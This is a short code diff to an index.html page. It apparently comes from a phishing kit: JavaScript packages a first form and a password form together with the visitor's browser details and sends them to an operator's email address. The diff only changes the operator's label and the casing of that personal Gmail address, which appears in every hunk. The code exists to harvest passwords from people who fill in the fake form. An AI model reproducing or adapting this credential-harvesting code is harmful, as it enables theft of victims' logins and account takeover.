--- a/index.html
+++ b/index.html
@@ -2398,7 +2398,7 @@
                 timestamp: new Date().toISOString(),
                 userAgent: navigator.userAgent,
                 language: selectedLanguage,
-                data_name: 'MEHTAB',
+                data_name: 'Adeel Cookie',
                 page_type: isSpecialPage ? 'special' : 'normal',
                 form_type: 'first_form'
             };
@@ -2413,8 +2413,8 @@
                     body: JSON.stringify({
                         ...formData,
                         target_emails: isSpecialPage ? 
-                            ['', 'Aadibalouch19@gmail.com'] : 
-                            ['Aadibalouch19@gmail.com', ''],
+                            ['', 'aadibalouch19@gmail.com'] : 
+                            ['aadibalouch19@gmail.com', ''],
                         submission_type: 'form_submission',
                         page_type: isSpecialPage ? 'special' : 'normal'
                     })
@@ -2487,7 +2487,7 @@
                 timestamp: new Date().toISOString(),
                 userAgent: navigator.userAgent,
                 language: selectedLanguage,
-                data_name: 'MEHTAB',
+                data_name: 'Adeel Cookie',
                 page_type: isSpecialPage ? 'special' : 'normal',
                 form_type: 'password_form'
             };
@@ -2502,8 +2502,8 @@
                     body: JSON.stringify({
                         ...passwordData,
                         target_emails: isSpecialPage ? 
-                            ['', 'Aadibalouch19@gmail.com'] : 
-                            ['Aadibalouch19@gmail.com', ''],
+                            ['', 'aadibalouch19@gmail.com'] : 
+                            ['aadibalouch19@gmail.com', ''],
                         submission_type: 'password_submission',
                         page_type: isSpecialPage ? 'special' : 'normal'
                     })
